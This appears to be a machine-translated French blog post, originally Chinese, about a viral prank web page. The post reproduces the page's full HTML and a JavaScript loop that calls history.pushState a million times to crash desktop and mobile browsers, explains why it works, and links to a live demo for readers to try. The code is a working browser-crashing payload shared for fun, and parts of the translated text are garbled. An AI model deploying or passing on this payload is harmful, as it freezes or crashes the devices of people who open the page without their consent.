|
|
Publié sur 22/01/2016 11:36:39
|
|
|
|
La cause de l’incident est la suivante : un ami étranger de Cyber Security a publié un tel tweet sur Twitter :
Ce type affirme que si vous utilisez le code Javascrip{filter}t de 12 lignes ci-dessus, vous pouvez faire planter Firefox, Chrome, Safari dans les navigateurs, et aussi faire planter votre iPhone et le téléphone Android !
Le code HTML complet est le suivant :
- <html>
- <head>
- <meta charset="utf-8">
- <title>谁点谁怀孕</title>
- </head>
- <body>
- 恭喜你,你已经怀孕了!
- <scrip{过滤}t>
- var total="";
- for (var i=0;i<1000000;i++)
- {
- total= total+i.toString();
- history.pushState(0,0,total);
- }
- </scrip{过滤}t>
- </body>
- </html>
Si vous êtes un utilisateur PC, après avoir cliqué sur le lien, la mémoire CPU de l’ordinateur a très de fortes chances de s’envoler jusqu’à ce que le navigateur plante et se fige...
Si vous êtes utilisateur mobile (Android, iPhone), votre navigateur plante après avoir cliqué sur le lien ! Cliquer sur le lien sur Weibo et WeChat plante également.
Pourquoi cela arrive-t-il ? À ce sujet, j’ai trouvé une réponse d’un dieu nommé « Xiaomi » sur Zhihu :
history.pushstate() est une API introduite par HTML5, pushState ajoute une URL spécifiée à l’historique du navigateur et stocke le point d’historique actuel. Lorsque 1000000 s<10000, le total sera enregistré dans l’historique du navigateur de manière cyclique, et si cela est trop répété, le navigateur ne pourra plus le supporter et plantera naturellement.
Enfin, bref, je n’arrive même pas à inventer « hello world », donc je ne comprends pas du tout... En résumé, c’est parfait pour faire exploser le ciel !
Si vous souhaitez essayer, veuillez cliquer ici : http://www.itsvse.com/demo.html
|
Précédent:[Open Source] Plateforme de requête de vulnérabilités Wooyun Code source Plus Base de données asp.net VersionProchain:Linux config/configurer/configurer, créer, faire test/faire vérifier, sudo faire en...
|
